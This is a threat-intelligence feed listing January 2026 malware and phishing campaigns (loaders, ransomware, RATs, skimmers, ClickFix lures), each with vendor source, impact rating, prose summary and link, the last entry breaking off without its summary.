Threat Research Feed

2026-01-16
CastleLoader_Stealthy_Loader_Targeting_Governments
HIGH
Intel Source:
Any.Run
Intel Name:
CastleLoader_Stealthy_Loader_Targeting_Governments
Date of Scan:
2026-01-16
Impact:
HIGH
Summary:
Researchers at ANY.RUN have identified a new variant of CastleLoader, a sophisticated multi-stage loader actively targeting government organizations and related infrastructure sectors. The malware functions as an initial access broker, delivering secondary payloads such as information stealers and remote access trojans while evading detection through complex execution chains. CastleLoader leverages an Inno Setup installer combined with AutoIt scripts to stage and deploy encrypted payloads, masking malicious activity behind legitimate installer behavior. Once executed, it uses process injection and API-level manipulation to execute in memory, bypassing static detection and endpoint monitoring tools. The analysis revealed deliberate use of API hashing, dynamic function resolution, and kernel-level process manipulation to conceal operations. Telemetry indicates CastleLoader’s capability to deliver multiple payloads while maintaining persistence, credential theft, and network reconnaissance functionality. Its modular design allows it to adapt across environments, suggesting ongoing development and use by organized threat actors.
Source: https://any.run/cybersecurity-blog/castleloader-malware-analysis/
2026-01-16
New_Magecart_Campaign
MEDIUM
Intel Source:
Silent Push
Intel Name:
New_Magecart_Campaign
Date of Scan:
2026-01-16
Impact:
MEDIUM
Summary:
Silent Push researchers have identified a previously untracked Magecart-style web-skimming operation active since at least early 2022. The campaign compromises e-commerce websites and injects malicious JavaScript designed to capture payment card details and other personal data entered at checkout. The group shows moderate to advanced capability through heavy JavaScript obfuscation, dynamic execution paths, DOM monitoring, and self-removal routines intended to minimize discovery. The campaign mainly affects online shoppers and the businesses that unknowingly host the malicious code, creating losses from card fraud, identity theft, and reputational damage. The operation relies on rotating third-party domains to extend longevity and avoid takedown efforts.
Source: https://www.silentpush.com/blog/magecart/#Indicators-Of-Future-Attack-(IOFA)
2026-01-16
DeadLock_Ransomware
MEDIUM
Intel Source:
Group-IB
Intel Name:
DeadLock_Ransomware
Date of Scan:
2026-01-16
Impact:
MEDIUM
Summary:
Researchers from Group-IB have identified a new ransomware family known as DeadLock, which first emerged in July 2025 and has steadily expanded its tooling and infrastructure since then. DeadLock distinguishes itself by abusing Polygon blockchain smart contracts to store and rotate proxy addresses supporting both the malware and its web-based ransom note infrastructure. Once executed, the ransomware encrypts files, alters extensions, replaces desktop wallpapers, and delivers ransom notes that increasingly assert data theft. The threat actors also rely on AnyDesk for remote access and execute PowerShell commands to terminate services, delete shadow copies, and remove evidence of the malware. DeadLock primarily targets organizations rather than individuals, aiming to cause widespread operational disruption, increase the risk of sensitive data exposure, and hinder recovery efforts by destroying backups.
Source: https://www.group-ib.com/blog/deadlock-ransomware-polygon-smart-contracts/
2026-01-16
RedVDS_Virtual_Desktop_Infrastructure_Abuse
HIGH
Intel Source:
Microsoft
Intel Name:
RedVDS_Virtual_Desktop_Infrastructure_Abuse
Date of Scan:
2026-01-16
Impact:
HIGH
Summary:
Researchers at Microsoft have identified RedVDS as a maliciously aligned virtual desktop hosting platform widely exploited by multiple threat actors for phishing, business email compromise attacks, and financial fraud. The service offers low-cost Windows-based remote servers that provide full administrative control and generate minimal logging, enabling attackers to operate with limited visibility. RedVDS supports rapid provisioning of cloned servers, accepts anonymous cryptocurrency payments, and permits unrestricted use for mass mailing, credential theft, and identity impersonation. There are multiple groups abusing the platform, including Storm-0259 and Storm-2470, rather than a lone operator. Impacted sectors include legal, construction, manufacturing, real estate, healthcare, and education. The RedVDS-enabled activity has contributed to more than $40 million in reported fraud losses in the United States since March 2025.
Source: https://www.microsoft.com/en-us/security/blog/2026/01/14/inside-redvds-how-a-single-virtual-desktop-provider-fueled-worldwide-cybercriminal-operations/
2026-01-15
VoidLink_Advanced_Cloud_Native_Linux_Malware
HIGH
Intel Source:
Check Point
Intel Name:
VoidLink_Advanced_Cloud_Native_Linux_Malware
Date of Scan:
2026-01-15
Impact:
HIGH
Summary:
Researchers at Check Point Research have identified a sophisticated Linux malware framework named VoidLink, engineered to achieve persistent, stealthy control across cloud and containerized environments. Developed in Zig, VoidLink leverages a highly modular architecture built around a custom plugin API, enabling dynamic deployment of more than thirty modules and numerous specialized plugins for reconnaissance, persistence, and privilege escalation. The framework demonstrates adaptive operational security (OPSEC) behavior, dynamically adjusting its evasion strategies based on the detected security posture, container type, or cloud provider—covering AWS, Azure, and GCP, among others.
Source: https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
2026-01-15
ShellBot_Linux_SSH_DDoS_Botnet_Surge
HIGH
Intel Source:
ASEC
Intel Name:
ShellBot_Linux_SSH_DDoS_Botnet_Surge
Date of Scan:
2026-01-15
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified an ongoing campaign targeting Linux SSH servers in the fourth quarter of 2025, driven primarily by the long-active threat group RUBYCARP using the ShellBot (PerlBot) malware family. The attacks rely on brute-force and dictionary-based intrusion attempts against poorly secured SSH services, leading to large-scale deployments of DDoS-capable bots. Once compromised, the systems are enrolled into an IRC-controlled botnet capable of executing multiple commands, including flooding, port scanning, file downloads, and remote command execution.
Source: https://asec.ahnlab.com/en/92004/
2026-01-14
Andariel_TigerRAT_Web_Server_Intrusions
HIGH
Intel Source:
ASEC
Intel Name:
Andariel_TigerRAT_Web_Server_Intrusions
Date of Scan:
2026-01-14
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing intrusion activity attributed to the Andariel threat group, targeting Windows-based web servers during the fourth quarter of 2025. The attacks involved the deployment of the TigerRAT backdoor through compromised IIS environments, where threat actors likely used web shells to gain initial access. Once inside, Andariel operators executed reconnaissance and system commands to enumerate host information and then leveraged PowerShell to retrieve additional payloads from external servers. TigerRAT enabled remote command execution, credential theft, screen capture, and tunneling capabilities, facilitating long-term control over compromised systems. The adversaries employed privilege escalation tools such as PrintSpoofer and Potato variants to gain elevated access and utilized ProcDump to extract sensitive credentials.
Source: https://asec.ahnlab.com/en/92002/
2026-01-14
Trigona_Targeting_Windows_SQL_Servers
HIGH
Intel Source:
ASEC
Intel Name:
Trigona_Targeting_Windows_SQL_Servers
Date of Scan:
2026-01-14
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified a resurgence of the Trigona threat actor targeting Windows-based database servers, particularly MS-SQL and MySQL, during the fourth quarter of 2025. The attackers leveraged legitimate administrative tools and system components to execute and conceal their operations, notably abusing the CLR Shell for command execution and privilege escalation. They also employed Bulk Copy Program (bcp.exe) to move malware between databases and local file systems, enabling infection directly through SQL environments. Trigona actors were observed deploying multiple payloads using Bitsadmin, Curl, and PowerShell to download additional malware, while maintaining persistence through remote access utilities such as AnyDesk and RustDesk.
Source: https://asec.ahnlab.com/en/92003/
2026-01-13
Konni_PowerShell_Espionage_via_LNK_Decoy
MEDIUM
Intel Source:
Dreaming Bluebird
Intel Name:
Konni_PowerShell_Espionage_via_LNK_Decoy
Date of Scan:
2026-01-13
Impact:
MEDIUM
Summary:
Researchers at Dreaming Bluebird have identified a new PowerShell-based malware attributed to the North Korean threat group Konni, disguised as a national security document. The campaign employs a malicious shortcut file titled National Security Report 2.lnk, which masquerades as a legitimate policy report related to the 9th Congress of the Workers' Party of Korea. When executed, the shortcut triggers a hidden PowerShell script configured with execution policy bypass and invisible window settings to evade user awareness. The script reconstructs and launches multiple embedded payloads, including a decoy document, executable, and supporting database files, suggesting a staged infection chain.
Source: https://wezard4u.tistory.com/429689
2026-01-13
Medusa_Ransomware_RMM_Abuse_Campaigns
HIGH
Intel Source:
Darktrace
Intel Name:
Medusa_Ransomware_RMM_Abuse_Campaigns
Date of Scan:
2026-01-13
Impact:
HIGH
Summary:
Researchers from Darktrace have uncovered a large-scale ransomware campaign conducted by the Medusa ransomware-as-a-service operation. Active since at least 2022 and expanding rapidly through 2024 and 2025, Medusa has emerged as one of the most active ransomware groups globally, with more than 500 confirmed victim organizations. The group’s primary objective is financial extortion through a combination of data theft, encryption, and operational disruption. Medusa actors typically obtain initial access through initial access brokers or by exploiting unpatched, internet-facing systems, including file transfer and remote management software. Following access, the attackers heavily abuse legitimate remote monitoring and management tools instead of relying solely on custom malware. These tools enable stealthy persistence, lateral movement, command-and-control, and large-scale data exfiltration while blending into normal administrative behavior. Prior to deploying ransomware, the group stages and exfiltrates sensitive data to attacker-controlled infrastructure. Ransomware execution is then performed directly on victim systems, encrypting files and delivering ransom notes. The combination of trusted tooling abuse, broad sector targeting, and triple-extortion tactics makes Medusa a high-impact and difficult-to-detect ransomware threat.
Source: https://www.darktrace.com/blog/under-medusas-gaze-how-darktrace-uncovers-rmm-abuse-in-ransomware-campaigns
2026-01-13
BlueDelta_Evolving_Credential_Harvesting_Campaigns
MEDIUM
Intel Source:
Insikt Group
Intel Name:
BlueDelta_Evolving_Credential_Harvesting_Campaigns
Date of Scan:
2026-01-13
Impact:
MEDIUM
Summary:
Recorded Future Insikt Group reports multiple credential-harvesting campaigns conducted between February and September 2025 by BlueDelta, a Russian state-sponsored threat group associated with the GRU. The activity expands BlueDelta's established credential-theft operations and shows refinement in lure themes, redirection chains, and credential capture logic. The actor's intent is to steal authentication material for espionage access to communications and remote-access services relevant to Russian intelligence priorities. BlueDelta impersonated common enterprise and consumer authentication portals, including Microsoft Outlook Web Access, Google, and Sophos VPN login experiences. Campaigns used multi-stage infrastructure, including link shorteners, free hosting, and tunneling services, to host phishing content and relay harvested data while limiting attribution. Several lures embedded legitimate PDF documents (for example, think-tank and climate publications) to increase credibility and bypass controls. JavaScript-based collection logic captured victim identifiers, page-open events, and submitted credentials, then redirected victims to legitimate destinations to reduce suspicion. Targeting observed in this reporting includes individuals linked to Turkish energy and nuclear research, a European think tank, and organizations in North Macedonia and Uzbekistan, aligning with government and policy-relevant collection interests. The operational "so what" is that these campaigns can convert a single user interaction into account compromise pathways against webmail and VPN access points, enabling follow-on intrusion, monitoring, and intelligence collection.
Source: https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting
2026-01-12
MuddyWater_RustyWater_Rust_Based_Espionage
HIGH
Intel Source:
CloudSEK
Intel Name:
MuddyWater_RustyWater_Rust_Based_Espionage
Date of Scan:
2026-01-12
Impact:
HIGH
Summary:
Researchers from CloudSEK have uncovered a spear-phishing driven cyber-espionage campaign attributed to the Iran-aligned MuddyWater threat group. Active through late 2025 and early 2026, the operation primarily targets diplomatic, maritime, financial, telecom, and education entities across the Middle East with the objective of long-term intelligence collection and sustained covert access. The attackers rely on socially engineered phishing emails carrying malicious Microsoft Word documents that abuse VBA macros for initial access. Once a victim enables content, the macros reconstruct and deploy a Rust-based implant known as RustyWater, marking a significant evolution from the group’s historical PowerShell and VBS tooling. After execution, the implant establishes persistence through Windows registry run keys and performs extensive host reconnaissance, including user, system, and domain profiling. RustyWater communicates with its command-and-control infrastructure over HTTP using encrypted, jittered beacons to evade detection. The malware supports modular, post-compromise capability expansion, allowing operators to tailor surveillance and collection activities based on the victim’s role and environment.
Source: https://www.cloudsek.com/blog/reborn-in-rust-muddywater-evolves-tooling-with-rustywater-implant#iocs
2026-01-10
Redtail_Malware_SSH_Upload_Activity
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
Redtail_Malware_SSH_Upload_Activity
Date of Scan:
2026-01-10
Impact:
MEDIUM
Summary:
Researchers at the SANS Internet Storm Center identified clusters of malicious activity involving Redtail malware through analysis of DShield honeypot sensor data. Using ELK and Gephi visualization, the study examined relationships between source IPs, filenames, and file hashes captured by Cowrie SSH honeypots over a 30-day period. The analysis revealed two distinct malware distribution groups, one attributed to Redtail, which demonstrated repeated file uploads and coordinated behavior across multiple sources. This activity highlights Redtail’s continued presence in automated scanning and exploitation campaigns targeting exposed SSH services. The research demonstrates the value of DShield sensor telemetry and graph-based analytics in uncovering distributed malware operations.
Source: https://isc.sans.edu/diary/rss/32608
2026-01-10
MassLogger_Email_Borne_Credential_Theft
MEDIUM
Intel Source:
Malware-Traffic-Analysis
Intel Name:
MassLogger_Email_Borne_Credential_Theft
Date of Scan:
2026-01-10
Impact:
MEDIUM
Summary:
Researchers at Malware-Traffic-Analysis.net identified a MassLogger infection campaign leveraging phishing emails with malicious compressed attachments to deliver credential-stealing malware. The infection chain began with a socially engineered message containing an archive file disguised as a quotation request, which, when extracted and executed, launched a Windows PE executable. This executable initiated the MassLogger malware, a .NET-based information stealer designed to harvest stored credentials and system details from the victim host. Following execution, the malware exfiltrated collected data through encrypted outbound email communication using standard network ports, blending its traffic with legitimate services. The infection exhibited typical keylogging and credential theft behavior but did not display lateral movement, persistence mechanisms, or destructive intent during sandbox testing.
Source: https://www.malware-traffic-analysis.net/2026/01/07/index.html
2026-01-10
GuLoader_HR_Phishing_Delivers_Remcos_RAT
HIGH
Intel Source:
ASEC
Intel Name:
GuLoader_HR_Phishing_Delivers_Remcos_RAT
Date of Scan:
2026-01-10
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified a phishing campaign distributing GuLoader malware disguised as human resources performance reports. The attack begins with emails crafted to appear as legitimate internal communications regarding employee performance evaluations. The attached RAR archive contains a malicious NSIS executable camouflaged as a PDF file, which executes GuLoader when opened. Upon execution, the loader retrieves shellcode from a remote command server, which subsequently deploys the Remcos remote access trojan. This secondary payload provides threat actors with extensive control over infected systems, enabling activities such as keylogging, credential theft, data exfiltration, and surveillance through webcams and microphones.
Source: https://asec.ahnlab.com/en/91825/
2026-01-10
LockBit_5_Advanced_RaaS_Encryption_Operations
HIGH
Intel Source:
ASEC
Intel Name:
LockBit_5_Advanced_RaaS_Encryption_Operations
Date of Scan:
2026-01-10
Impact:
HIGH
Summary:
Researchers at AhnLab ASEC have identified LockBit 5.0 as the latest evolution of the long-running Ransomware-as-a-Service (RaaS) operation that remains one of the most active global cybercrime threats. LockBit 5.0 demonstrates a high degree of automation and sophistication, utilizing multi-stage intrusion methods including exploitation of vulnerabilities, brute-force credential attacks, and lateral movement before deploying ransomware payloads. The variant employs modern cryptographic mechanisms such as ChaCha20-Poly1305 for file encryption and X25519 with BLAKE2b for key exchange, producing unique encryption keys and extensions per victim to evade traditional detection. It disables system recovery mechanisms by terminating volume shadow services and backup-related processes, while excluding critical system directories to preserve system stability during encryption.
Source: https://asec.ahnlab.com/en/91945/
2026-01-10
Remcos_RAT_Phishing_Campaigns_via_Fake_Documents
HIGH
Intel Source:
ASEC
Intel Name:
Remcos_RAT_Phishing_Campaigns_via_Fake_Documents
Date of Scan:
2026-01-10
Impact:
HIGH
Summary:
Researchers at ASEC have identified a widespread phishing campaign in December 2025 that primarily leveraged document and compressed file attachments to deliver the Remcos remote access trojan (RAT). The majority of observed email threats during this period—approximately 91 percent—were classified as phishing, with attackers using HTML-based fake login and payment pages to capture victim credentials. These phishing messages often impersonated trusted entities such as financial institutions or tax agencies and included Korean-language lures with convincing subject lines and attachment names. Once opened, the attached files either redirected users to malicious websites or executed embedded payloads that downloaded Remcos RAT from attacker-controlled servers. The malware then granted the threat actors persistent remote access, enabling credential theft, surveillance, and further system compromise.
Source: https://asec.ahnlab.com/en/91944/
2026-01-09
Escape_of_ESXi_VM
HIGH
Intel Source:
Huntress
Intel Name:
Escape_of_ESXi_VM
Date of Scan:
2026-01-09
Impact:
HIGH
Summary:
Researchers at Huntress have identified a highly advanced attack targeting VMware ESXi servers that enables threat actors to break out of virtual machines and take full control of the hypervisor. The attackers initially gained access using stolen VPN credentials and then moved laterally with domain administrator privileges until reaching the ESXi environment. Once there, they deployed custom tooling that disabled core security protections, loaded an unsigned driver through a BYOVD technique, and executed a VM escape. This gave them kernel-level control of the host and access to all virtual machines running on it. The attackers also installed a stealthy VSock backdoor that hides from normal network monitoring and appears designed for later ransomware activity.
Source: https://www.huntress.com/blog/esxi-vm-escape-exploit
2026-01-09
UAT7290_Targets_Telecommunications_Infrastructure
HIGH
Intel Source:
Cisco Talos
Intel Name:
UAT7290_Targets_Telecommunications_Infrastructure
Date of Scan:
2026-01-09
Impact:
HIGH
Summary:
Researchers from Cisco have uncovered a long-running cyber-espionage campaign linked to the China-based threat group UAT-7290. Active since at least 2022, the group has focused on telecommunications providers and other critical infrastructure with the objective of collecting intelligence and maintaining long-term, covert access to target networks. The attackers rely on two main techniques: exploiting unpatched vulnerabilities and brute-forcing exposed internet-facing devices. After gaining access, they deploy custom malware tailored for both Linux networking equipment and Windows environments, enabling persistent remote control, file manipulation, and lateral movement. The group conducts extensive reconnaissance to understand victim environments prior to exploitation, and its tools and behaviors closely overlap with those of other well-established China-linked threat actors.
Source: https://blog.talosintelligence.com/uat-7290/
2026-01-09
Malicious_NPM_Packages_Deliver_NodeCordRAT
MEDIUM
Intel Source:
Zscaler
Intel Name:
Malicious_NPM_Packages_Deliver_NodeCordRAT
Date of Scan:
2026-01-09
Impact:
MEDIUM
Summary:
Researchers at Zscaler uncovered a campaign involving malicious npm packages masquerading as legitimate Bitcoin-related libraries, which secretly install a remote access tool known as NodeCordRAT. The attackers primarily target developers and others who install these packages directly or through dependent libraries. Once executed, the malware performs host fingerprinting, runs arbitrary shell commands, captures screenshots, and exfiltrates files and sensitive data. Communication with the threat actor is carried out via private Discord channels that function as command-and-control infrastructure. Initial access is enabled through typosquatted npm packages that deploy malicious dependencies during post-install scripts. The impact includes the theft of Chrome credentials, sensitive documents, and MetaMask wallet data, creating significant financial and privacy risks.
Source: https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deliver-nodecordrat
2026-01-09
Fake_WinRAR_Installer_Malware_Delivery
MEDIUM
Intel Source:
Malwarebytes
Intel Name:
Fake_WinRAR_Installer_Malware_Delivery
Date of Scan:
2026-01-09
Impact:
MEDIUM
Summary:
Malwarebytes researchers have identified a campaign distributing fake WinRAR installers across multiple Chinese-language websites. The operation uses trojanized installers that deliver malware while presenting users with a legitimate installation workflow. The objective is to lure individuals seeking popular file-compression software into unknowingly executing a malicious payload. The delivery chain relies on self-extracting archives that execute multiple embedded executables in sequence. One component installs the genuine WinRAR application to maintain user trust and mask malicious activity. A second payload deploys malware tied to the Winizipper family. Once executed, the malware establishes a covert backdoor that provides attackers with remote access, enabling data theft, system control, and the potential deployment of additional payloads.
Source: https://www.malwarebytes.com/blog/threat-intel/2026/01/fake-winrar-downloads-hide-malware-behind-a-real-installer
2026-01-09
KongTuke_ClickFix_Loader_Campaign
MEDIUM
Intel Source:
Malware-Traffic-Analysis
Intel Name:
KongTuke_ClickFix_Loader_Campaign
Date of Scan:
2026-01-09
Impact:
MEDIUM
Summary:
Researchers at Malware-Traffic-Analysis.net have identified a new malware campaign involving the KongTuke loader, which uses a deceptive ClickFix CAPTCHA page to deliver malicious payloads to Windows systems. The activity begins when users encounter a fake verification prompt that executes a hidden PowerShell command, leading to the download and installation of a malicious archive. Once executed, the malware installs components into user-level directories and creates scheduled tasks that ensure continuous operation by relaunching its processes every few minutes. Subsequent payloads retrieved from remote servers install additional modules, expand persistence mechanisms, and execute obfuscated scripts to avoid detection. KongTuke’s behavior reflects a multi-stage loader framework designed for maintaining footholds and preparing compromised systems for secondary payloads, such as information stealers or remote access tools.
Source: https://www.malware-traffic-analysis.net/2026/01/08/index.html
2026-01-08
CrazyHunter_ransomware_Target_Taiwan_Healthcare
HIGH
Intel Source:
Trellix
Intel Name:
CrazyHunter_ransomware_Target_Taiwan_Healthcare
Date of Scan:
2026-01-08
Impact:
HIGH
Summary:
Researchers from Trellix uncovered a rapidly expanding ransomware campaign operated by the group known as CrazyHunter. The campaign centres on attacks against healthcare providers in Taiwan. Once inside a network, the attackers move quietly and deliberately, exploiting weak passwords in Active Directory, abusing Group Policy for wide distribution, and escalating privileges to gain control. The ransomware disables endpoint security using a bring-your-own-vulnerable-driver technique. Once deployed, it encrypts data using a hybrid ChaCha20 and ECIES scheme that complicates recovery without the attacker’s private key. The malware avoids encrypting critical system directories to maintain stability, then displays a ransom note and custom wallpaper to pressure victims into paying. The group operates with clear professionalism, exfiltrating sensitive data, publishing stolen files on leak sites, and conducting negotiations via email, Telegram, and TOR channels.
Source: https://www.trellix.com/blogs/research/the-ghost-in-the-machine-crazyhunters-stealth-tactics/
2026-01-07
Lovable_Malicious_Chrome_Chat_Extensions
HIGH
Intel Source:
OX Security
Intel Name:
Lovable_Malicious_Chrome_Chat_Extensions
Date of Scan:
2026-01-07
Impact:
HIGH
Summary:
Researchers at OX Security have identified a large-scale malware campaign involving two malicious Chrome extensions impersonating the legitimate AITOPIA AI Sidebar tool. The fraudulent extensions, distributed via the official Chrome Web Store, secretly exfiltrated data from users’ ChatGPT and DeepSeek conversations alongside their general browsing activity. The campaign affected over 900,000 users worldwide, including those in corporate environments where sensitive business and research data may have been exposed. The extensions operated under the guise of offering enhanced AI chat functionality but instead captured prompts, responses, and browsing metadata, transmitting them to attacker-controlled servers at regular intervals. The threat actors, tracked as Lovable, used deceptive branding, false privacy policies, and infrastructure anonymization to evade attribution.
Source: https://www.ox.security/blog/malicious-chrome-extensions-steal-chatgpt-deepseek-conversations/
2026-01-07
Spoofed_Domain_Phishing_via_Complex_Routing
HIGH
Intel Source:
Microsoft
Intel Name:
Spoofed_Domain_Phishing_via_Complex_Routing
Date of Scan:
2026-01-07
Impact:
HIGH
Summary:
Researchers at Microsoft have identified phishing campaigns in which attackers abuse email configurations and routing rather than exploiting software vulnerabilities. In these operations, threat actors take advantage of complex email routing setups and poorly enforced spoofing protections to deliver phishing emails that appear to originate from within the victim organization. The primary objectives are credential theft and financial fraud, including business email compromise and fraudulent invoice payments. To scale these campaigns and bypass multi-factor authentication, attackers leverage phishing-as-a-service platforms such as Tycoon2FA that employ adversary-in-the-middle techniques. Organizations with misconfigured or permissive SPF, DKIM, or DMARC policies, enabled Direct Send usage, or third-party mail connectors are particularly vulnerable. The impact includes credential compromise, mailbox takeover, unauthorized financial transactions, and potential data loss.
Source: https://www.microsoft.com/en-us/security/blog/2026/01/06/phishing-actors-exploit-complex-routing-and-misconfigurations-to-spoof-domains/
2026-01-07
AI_Enabled_Gobruteforcer_Malware
HIGH
Intel Source:
Check Point
Intel Name:
AI_Enabled_Gobruteforcer_Malware
Date of Scan:
2026-01-07
Impact:
HIGH
Summary:
Researchers from Check Point have uncovered a campaign using Gobruteforcer, a modular malware and botnet framework designed to target internet-exposed Linux servers. The threat group relies on large-scale brute-force attempts and weak or default passwords to access services such as FTP, MySQL, PostgreSQL, and phpMyAdmin, even using AI-generated username/password patterns to increase success. After gaining access, the malware deploys cryptominers to steal computing resources and can also connect the system to an IRC-based botnet for remote control. The toolset adapts to different system environments, hides its processes, and ensures it can stay on a compromised machine for as long as possible. Rather than using stealthy exploits, the operation prioritizes massive scanning and automated logins to compromise as many systems as it can. The campaign primarily affects misconfigured Linux servers and results in wasted computing resources, increased security risk, and potential follow-on attacks.
Source: https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/
2026-01-06
Kimsuky_VBScript_Downloader
MEDIUM
Intel Source:
Dreaming Bluebird
Intel Name:
Kimsuky_VBScript_Downloader
Date of Scan:
2026-01-06
Impact:
MEDIUM
Summary:
Researchers at Dreaming Bluebird have identified a VBScript-based downloader attributed to the North Korean threat group Kimsuky, known for espionage and data theft operations under the Reconnaissance General Bureau. The malware, named 1.vba, employs a Caesar cipher for string obfuscation and reconstructs its code at runtime using the VBScript Execute function to evade static antivirus detection. Once deobfuscated, it creates several common COM objects—such as WScript.Shell, FileSystemObject, and XMLHTTP—to perform file downloads and execute payloads from remote sources. This technique enables the actor to leverage trusted infrastructure and script-native capabilities to deliver secondary stages without triggering conventional defenses.
Source: https://wezard4u.tistory.com/429685
2026-01-06
Sliver_C2_Hosted_on_Compromised_FortiWeb_Firewalls
MEDIUM
Intel Source:
Ctrlaltintel
Intel Name:
Sliver_C2_Hosted_on_Compromised_FortiWeb_Firewalls
Date of Scan:
2026-01-06
Impact:
MEDIUM
Summary:
Researchers have uncovered a threat actor abusing compromised FortiWeb WAF appliances to operate the Sliver post-exploitation framework for long-term covert access. The actor exploited public-facing FortiWeb vulnerabilities, including React2Shell (CVE-2025-55182), to deploy implants and prioritized persistence and traffic proxying over immediate financial gain. The actor also deployed Fast Reverse Proxy (FRP) and a modified microsocks binary to expose internal services and provide SOCKS-based proxy access through trusted edge devices. Affected organizations include government and financial sectors, with activity notably concentrated in Bangladesh and Pakistan. The impact includes loss of perimeter trust, covert traffic relaying, and elevated risk of downstream compromise. The use of decoy websites impersonating Ubuntu Packages and the Bangladesh Airforce indicates a blend of regional targeting and opportunistic exploitation.
Source: https://ctrlaltintel.com/threat%20research/FortiWeb-Sliver/#iocs
2026-01-06
PHALT_BLYX_Fake_BSOD_Malware_Chain
HIGH
Intel Source:
Securonix Threat Research
Intel Name:
PHALT_BLYX_Fake_BSOD_Malware_Chain
Date of Scan:
2026-01-06
Impact:
HIGH
Summary:
Researchers at Securonix Threat Labs have identified an advanced multi-stage campaign, tracked as PHALT#BLYX, that combines deceptive social engineering with trusted tool abuse to deliver a remote access trojan. The operation targets the hospitality sector using phishing emails that impersonate Booking.com reservation alerts to lure victims to fraudulent websites. These pages display fake CAPTCHA errors and a counterfeit Blue Screen of Death designed to coerce users into performing a “ClickFix” action, which secretly executes malicious PowerShell commands. The script downloads and runs a tampered MSBuild project, leveraging the legitimate Microsoft utility to compile and execute embedded malware code while bypassing standard defenses. The campaign demonstrates technical maturity through layered defense evasion, including Windows Defender exclusions, process hollowing, and the use of encrypted communications. The final payload, a variant of DCRat, grants attackers full system control, persistence, and the ability to deploy secondary malware. Linguistic artifacts and infrastructure suggest a Russian-speaking threat actor with operational discipline and familiarity with living-off-the-land techniques. This campaign underscores the increasing convergence of psychological manipulation and legitimate tool abuse in modern malware delivery.
Source: https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/
2026-01-05
DarkSpectre_Large_Scale_Browser_Extension_Espionage
HIGH
Intel Source:
Koi Security
Intel Name:
DarkSpectre_Large_Scale_Browser_Extension_Espionage
Date of Scan:
2026-01-05
Impact:
HIGH
Summary:
Researchers at Koi Security have identified DarkSpectre, a coordinated Chinese cyber campaign responsible for compromising over 8.8 million browsers across Chrome, Edge, Firefox, and Opera through malicious extensions. The threat actor operated three interconnected campaigns—ShadyPanda, GhostPoster, and The Zoom Stealer—that began as legitimate browser tools before being weaponized for espionage, surveillance, and financial fraud. DarkSpectre maintained benign-seeming extensions for several years, achieving “verified” marketplace status before activating hidden payloads. These payloads enabled remote code injection, data exfiltration, credential theft, and real-time monitoring of corporate meetings and communications.
Source: https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
2026-01-05
APT36_Fileless_Espionage_Targeting_India
HIGH
Intel Source:
CYFIRMA
Intel Name:
APT36_Fileless_Espionage_Targeting_India
Date of Scan:
2026-01-05
Impact:
HIGH
Summary:
Researchers at CYFIRMA have observed that APT36, also known as Transparent Tribe, a Pakistan-aligned espionage group, carried out a multi-stage phishing operation targeting Indian government and strategic entities. The campaign relied on a weaponized Windows shortcut file masquerading as a legitimate PDF inside a ZIP archive, enabling fileless delivery of a Remote Access Trojan. Execution was triggered via native Windows utilities to retrieve and run a malicious script, which decrypted multiple payloads directly in memory to avoid disk artifacts. The attack chain included two core components: one that weakened .NET security controls and another that loaded a malicious DLL responsible for full RAT functionality, including encrypted command-and-control communication, data exfiltration, screenshot capture, and remote system control. Persistence was designed to be antivirus-aware, dynamically adjusting techniques based on the security products detected, and leveraged registry changes, startup shortcuts, and script-based mechanisms. Overall, the activity reflects a focus on stealthy, long-term intelligence collection, highlighting APT36’s shift toward modular, memory-resident implants, extensive living-off-the-land abuse, and resilient persistence aimed at sustained espionage against Indian government environments.
Source: https://www.cyfirma.com/research/apt36-multi-stage-lnk-malware-campaign-targeting-indian-government-entities/
2026-01-05
ClickFix_Clipboard_Based_Infection_Chain
HIGH
Intel Source:
Hudson Rock Threat Intelligence
Intel Name:
ClickFix_Clipboard_Based_Infection_Chain
Date of Scan:
2026-01-05
Impact:
HIGH
Summary:
Researchers at Hudson Rock have identified a rapidly evolving malware delivery technique known as ClickFix, which transforms ordinary users into unwitting distributors of infostealer malware. This campaign leverages social engineering rather than exploit kits—tricking victims into executing clipboard-injected PowerShell commands under the guise of security checks or update prompts. Once executed, these scripts retrieve and run info-stealing payloads directly in memory, enabling credential theft and further compromise without relying on traditional file-based execution.
Source: https://www.infostealers.com/article/from-victim-to-vector-how-infostealers-turn-legitimate-businesses-into-malware-hosts/
2026-01-05
Rogue_ScreenConnect_Delivered_RMM_Abuse
MEDIUM
Intel Source:
Huntress
Intel Name:
Rogue_ScreenConnect_Delivered_RMM_Abuse
Date of Scan:
2026-01-05
Impact:
MEDIUM
Summary:
Researchers from Huntress have uncovered a wave of incidents in which attackers use social engineering to install a rogue version of the ScreenConnect remote management tool on victim systems. The attackers impersonate routine business activities such as sending invitations, invoices, or account statements to trick users into running malicious installers. Once installed, the fake ScreenConnect setup gives the attacker persistent remote access to the endpoint. This activity does not exploit a software vulnerability in ScreenConnect itself but instead abuses the trust users place in a legitimate and widely used RMM tool. Campaigns observed throughout 2025 show repeated reuse of lure themes, file names, domains, and hashes, suggesting moderate operational maturity rather than highly customized attacks. Victims span multiple organizations, with infrastructure reused over time. The primary goal appears to be gaining unauthorized remote access, which can enable follow-on actions such as credential theft, lateral movement, and deeper compromise.
Source: https://www.huntress.com/blog/rogue-screenconnect-social-engineering-tactics-2025
2026-01-05
Lumma_Stealer_Multi_Stage_Windows_Infection
MEDIUM
Intel Source:
Malware-Traffic-Analysis
Intel Name:
Lumma_Stealer_Multi_Stage_Windows_Infection
Date of Scan:
2026-01-05
Impact:
MEDIUM
Summary:
